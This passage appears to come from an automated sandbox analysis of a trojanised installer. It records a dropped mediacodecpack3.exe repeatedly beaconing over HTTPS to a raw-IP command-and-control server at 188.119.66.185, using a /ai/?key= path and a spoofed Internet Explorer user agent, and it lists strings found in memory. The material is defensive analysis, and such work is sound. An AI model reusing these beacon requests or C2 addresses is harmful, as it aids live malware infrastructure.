                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_02B92B95 WSASetLastError,WSARecv,WSASetLastError,select,2_2_02B92B95
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa15d105633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261cda3088 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed1db9459 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: steel.exe.3.tmp, 00000001.00000002.2981700405.0000000005C8C000.00000004.00001000.00020000.00000000.sdmp, mediacodecpack3.exe, 00000002.00000000.1743322718.00000000004D2000.00000002.00000001.01000000.00000009.sdmp, mediacodecpack3.exe.1.dr, MediaCodecPack.exe.2.dr, is-VED6B.tmp.1.drString found in binary or memory: http://wonderwork.ucoz.com/
                    Source: steel.exe.3.tmp, steel.exe.3.tmp, 00000001.00000000.1732720470.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-67S07.tmp.1.dr, steel.exe.3.tmp.0.drString found in binary or memory: http://www.innosetup.com/
                    Source: steel.exe.3.exeString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
                    Source: steel.exe.3.exeString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                    Source: steel.exe.3.exe, 00000000.00000003.1732080677.0000000002168000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.exe, 00000000.00000003.1731820756.00000000023D0000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.tmp, steel.exe.3.tmp, 00000001.00000000.1732720470.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-67S07.tmp.1.dr, steel.exe.3.tmp.0.drString found in binary or memory: http://www.remobjects.com/ps
                    Source: steel.exe.3.exe, 00000000.00000003.1732080677.0000000002168000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.exe, 00000000.00000003.1731820756.00000000023D0000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.tmp, 00000001.00000000.1732720470.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-67S07.tmp.1.dr, steel.exe.3.tmp.0.drString found in binary or memory: http://www.remobjects.com/psU
                    Source: mediacodecpack3.exe, 00000002.00000002.2982383221.000000000335A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/
                    Source: mediacodecpack3.exe, 00000002.00000002.2982383221.000000000335A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/A654B8DF3C4585F17B60DA6690D18421A0182C8
                    Source: mediacodecpack3.exe, 00000002.00000002.2981066269.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, mediacodecpack3.exe, 00000002.00000002.2981066269.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e3008888325
                    Source: mediacodecpack3.exe, 00000002.00000002.2982383221.000000000335A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4
                    Source: mediacodecpack3.exe, 00000002.00000002.2981066269.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/en-GB
                    Source: mediacodecpack3.exe, 00000002.00000002.2982383221.000000000335A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/ography
                    Source: mediacodecpack3.exe, 00000002.00000002.2981066269.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/priseCertificates
                    Source: mediacodecpack3.exe, 00000002.00000002.2982383221.000000000335A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/rosoft
                    Source: steel.exe.3.exe, 00000000.00000003.1731421977.00000000023D0000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.exe, 00000000.00000002.2980863339.0000000002161000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.exe, 00000000.00000003.1731515225.0000000002161000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.tmp, 00000001.00000003.1733523612.0000000003130000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.tmp, 00000001.00000003.1733603131.0000000002138000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.tmp, 00000001.00000002.2981234148.0000000002138000.00000004.00001000.00020000.00000000.sdmp, steel.exe.3.tmp, 00000001.00000002.2980978072.00000000005A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.easycutstudio.com/support.html
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
